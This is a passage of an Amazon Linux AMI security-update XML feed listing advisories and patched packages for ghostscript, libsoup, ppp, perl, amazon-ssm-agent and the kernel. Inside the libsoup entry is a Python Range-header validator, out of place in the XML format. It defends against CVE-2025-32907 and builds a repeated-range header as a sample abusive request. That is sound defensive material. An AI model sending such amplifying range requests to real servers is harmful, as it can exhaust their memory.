name="kernel-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-196.643.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1978</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1978: important priority package update for ghostscript</title><issued date="2025-05-08 22:29:00" /><updated date="2025-05-12 13:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-46956:
PostScript interpreter - fix buffer length check
NOTE: https://bugs.ghostscript.com/show_bug.cgi?id=707895
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=f4151f12db32cd3ed26c24327de714bf2c3ed6ca
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=ea69a1388245ad959d31c272b5ba66d40cebba2c (ghostpdl-10.04.0)
CVE-2024-46953:
Check for overflow validating format string
NOTE: https://bugs.ghostscript.com/show_bug.cgi?id=707793
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=1f21a45df0fa3abec4cff12951022b192dda3c00
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=294a3755e33f453dd92e2a7c4cfceb087ac09d6a (ghostpdl-10.04.0)
CVE-2024-46951:
PS interpreter - check the type of the Pattern Implementation
NOTE: https://bugs.ghostscript.com/show_bug.cgi?id=707991
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=f49812186baa7d1362880673408a6fbe8719b4f8
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=ada21374f0c90cc3acf7ce0e96302394560c7aee (ghostpdl-10.04.0)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46951" title="" id="CVE-2024-46951" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46953" title="" id="CVE-2024-46953" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46956" title="" id="CVE-2024-46956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-devel" version="8.70" release="24.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.35.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.35.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.35.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.35.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.35.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.35.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.35.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.35.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.35.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.35.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.35.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" 
type="security" from="linux-security@amazon.com"><id>ALAS-2025-1979</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1979: important priority package update for libsoup</title><issued date="2025-05-21 21:01:00" /><updated date="2025-05-27 12:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-32914:
A flaw was found in libsoup, where the soup_multipart_new_from_message() function is vulnerable to an out-of-bounds read. This flaw allows a malicious HTTP client to induce the libsoup server to read out of bounds.
CVE-2025-32913:
A flaw was found in libsoup, where the soup_message_headers_get_content_disposition() function is vulnerable to a NULL pointer dereference. This flaw allows a malicious HTTP peer to crash a libsoup client or server that uses this function.
CVE-2025-32911:
libsoup: Double free on soup_message_headers_get_content_disposition() through "soup-message-headers.c" via "params" GHashTable value
CVE-2025-32907:
A flaw was found in libsoup. The implementation of HTTP range requests is vulnerable to a resource consumption attack. This flaw allows a malicious client to request the same range many times in a single HTTP request, causing the server to use large amounts of memory.
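A Range header lets one request ask for many byte ranges, and a server that allocates per range without bounding the count or noticing that the ranges repeat can be made to buffer far more than the resource's size. The following added example (written for this advisory, not libsoup code; the names and the cap of 8 ranges are assumptions) parses the bytes= form of the header and refuses requests with too many ranges, repeated or overlapping ranges, or unsatisfiable specs, which removes the amplification the description relies on.

```python
import re

# Assumed cap for this example; real servers choose their own limit.
MAX_RANGES = 8

_SPEC_RE = re.compile(r"^(\d*)-(\d*)$")


class BadRange(ValueError):
    """Raised for Range headers a server should refuse rather than serve."""


def parse_byte_ranges(header_value, resource_length, max_ranges=MAX_RANGES):
    """Turn 'bytes=a-b, c-d' into sorted, non-overlapping (start, end) pairs.

    Hypothetical helper for this advisory. The checks that matter against
    resource exhaustion: cap the number of ranges, reject ranges that repeat
    or overlap, and reject unsatisfiable specs instead of serving the body.
    """
    if not header_value.startswith("bytes="):
        raise BadRange("unsupported range unit")
    specs = [s.strip() for s in header_value[6:].split(",") if s.strip()]
    if not specs:
        raise BadRange("empty range set")
    if len(specs) > max_ranges:
        raise BadRange("too many ranges: %d" % len(specs))
    last_byte = resource_length - 1
    ranges = []
    for spec in specs:
        m = _SPEC_RE.match(spec)
        if not m or spec == "-":
            raise BadRange("malformed range spec %r" % spec)
        first, last = m.groups()
        if first == "":
            # Suffix range "-N": the final N bytes of the resource.
            n = int(last)
            if n == 0:
                raise BadRange("zero-length suffix range")
            start, end = max(resource_length - n, 0), last_byte
        else:
            start = int(first)
            end = last_byte if last == "" else min(int(last), last_byte)
            if start > last_byte or start > end:
                raise BadRange("unsatisfiable range %r" % spec)
        ranges.append((start, end))
    ranges.sort()
    for (_, prev_end), (start, _) in zip(ranges, ranges[1:]):
        # Identical ranges sort next to each other, so repeats are caught here.
        if not start > prev_end:
            raise BadRange("overlapping or repeated ranges")
    return ranges


def range_request_is_rejected(header_value, resource_length):
    """True if parse_byte_ranges refuses the header."""
    try:
        parse_byte_ranges(header_value, resource_length)
    except BadRange:
        return True
    return False


# Constructed requests: a legitimate two-range request and an abusive one
# that names the same range over and over.
LEGIT = "bytes=0-99, 200-299"
REPEATED = "bytes=" + ",".join(["0-99"] * 5)

if __name__ == "__main__":
    print(parse_byte_ranges(LEGIT, 1000))
    print("repeated ranges rejected:", range_request_is_rejected(REPEATED, 1000))
```

Rejecting the request outright (HTTP 416 or 400, or simply answering with the full body and no multipart response) is the safe default: once a server has decided to honour a range set, its memory use should be bounded by the resource size, not by the number of comma-separated specs an anonymous client can type.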
CVE-2025-32906:
A flaw was found in libsoup, where the soup_headers_parse_request() function may be vulnerable to an out-of-bounds read. This flaw allows a malicious user to use a specially crafted HTTP request to crash the HTTP server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32906" title="" id="CVE-2025-32906" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32907" title="" id="CVE-2025-32907" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32911" title="" id="CVE-2025-32911" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32913" title="" id="CVE-2025-32913" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32914" title="" id="CVE-2025-32914" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libsoup-devel" version="2.28.2" release="5.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsoup-devel-2.28.2-5.9.amzn1.x86_64.rpm</filename></package><package name="libsoup-debuginfo" version="2.28.2" release="5.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsoup-debuginfo-2.28.2-5.9.amzn1.x86_64.rpm</filename></package><package name="libsoup" version="2.28.2" release="5.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsoup-2.28.2-5.9.amzn1.x86_64.rpm</filename></package><package name="libsoup-devel" version="2.28.2" release="5.9.amzn1" epoch="0" arch="i686"><filename>Packages/libsoup-devel-2.28.2-5.9.amzn1.i686.rpm</filename></package><package name="libsoup" version="2.28.2" release="5.9.amzn1" epoch="0" arch="i686"><filename>Packages/libsoup-2.28.2-5.9.amzn1.i686.rpm</filename></package><package name="libsoup-debuginfo" version="2.28.2" release="5.9.amzn1" epoch="0" arch="i686"><filename>Packages/libsoup-debuginfo-2.28.2-5.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1980</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1980: important priority package update for 
ppp</title><issued date="2025-05-21 21:01:00" /><updated date="2025-05-27 12:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-58250:
The passprompt plugin in pppd in ppp before 2.5.2 mishandles privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58250" title="" id="CVE-2024-58250" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ppp-debuginfo" version="2.4.5" release="11.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-debuginfo-2.4.5-11.10.amzn1.x86_64.rpm</filename></package><package name="ppp" version="2.4.5" release="11.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-2.4.5-11.10.amzn1.x86_64.rpm</filename></package><package name="ppp-devel" version="2.4.5" release="11.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-devel-2.4.5-11.10.amzn1.x86_64.rpm</filename></package><package name="ppp-debuginfo" version="2.4.5" release="11.10.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-debuginfo-2.4.5-11.10.amzn1.i686.rpm</filename></package><package name="ppp" version="2.4.5" release="11.10.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-2.4.5-11.10.amzn1.i686.rpm</filename></package><package name="ppp-devel" version="2.4.5" release="11.10.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-devel-2.4.5-11.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1981</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1981: important priority package update for perl</title><issued date="2025-06-06 00:29:00" /><updated date="2025-06-06 00:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-40909:
Thread creation while a directory handle is open does an fchdir, affecting other threads (race condition).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-40909" title="" id="CVE-2025-40909" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-core" version="5.16.3" release="294.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-core-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.45.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-debuginfo-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Zlib" version="1.10" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-IO-Zlib-1.10-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.21" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Locale-Maketext-Simple-0.21-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Package-Constants-0.02-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Time-Piece-1.20.1-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.45.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-tests-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.28.2.6" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-ExtUtils-CBuilder-0.28.2.6-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Pod-Escapes-1.04-294.45.amzn1.noarch.rpm</filename></package><package name="perl" version="5.16.3" release="294.45.amzn1" epoch="4" 
arch="x86_64"><filename>Packages/perl-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-Module-CoreList" version="2.76.02" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-CoreList-2.76.02-294.45.amzn1.noarch.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.45.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-libs-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.45.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-devel-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-Install" version="1.58" release="294.45.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-ExtUtils-Install-1.58-294.45.amzn1.noarch.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.30" release="294.45.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-ExtUtils-Embed-1.30-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Module-Loaded" version="0.08" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-Loaded-0.08-294.45.amzn1.noarch.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.45.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-macros-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-CPAN" version="1.9800" release="294.45.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-CPAN-1.9800-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Object-Accessor" version="0.42" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Object-Accessor-0.42-294.45.amzn1.noarch.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.45.amzn1" epoch="4" arch="i686"><filename>Packages/perl-debuginfo-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl" version="5.16.3" release="294.45.amzn1" epoch="4" 
arch="i686"><filename>Packages/perl-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.45.amzn1" epoch="4" arch="i686"><filename>Packages/perl-devel-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.45.amzn1" epoch="4" arch="i686"><filename>Packages/perl-macros-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.45.amzn1" epoch="4" arch="i686"><filename>Packages/perl-libs-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.45.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Time-Piece-1.20.1-294.45.amzn1.i686.rpm</filename></package><package name="perl-core" version="5.16.3" release="294.45.amzn1" epoch="0" arch="i686"><filename>Packages/perl-core-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.45.amzn1" epoch="4" arch="i686"><filename>Packages/perl-tests-5.16.3-294.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1982</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1982: important priority package update for amazon-ssm-agent</title><issued date="2025-06-06 00:29:00" /><updated date="2025-06-06 00:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-22869:
SSH servers which implement file transfer protocols are vulnerable to a denial of service attack from clients which complete the key exchange slowly, or not at all, causing pending content to be read into memory, but never transmitted.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-22869" title="" id="CVE-2025-22869" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-ssm-agent" version="3.3.2299.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-3.3.2299.0-1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1983</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1983: important priority package update for kernel</title><issued date="2025-06-06 00:29:00" /><updated date="2025-06-06 00:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-21722:
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: do not force clear folio if buffer is referenced
CVE-2024-58083:
In the Linux kernel, the following vulnerability has been resolved:
KVM: Explicitly verify target vCPU is online in kvm_get_vcpu()
CVE-2024-53173:
In the Linux kernel, the following vulnerability has been resolved:
NFSv4.0: Fix a use-after-free problem in the asynchronous open()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53173" title="" id="CVE-2024-53173" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58083" title="" id="CVE-2024-58083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21722" title="" id="CVE-2025-21722" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package 
name="kernel-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="196.647.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-196.647.amzn1.i686.rpm</filename></package></collection></pkglist></update></updates>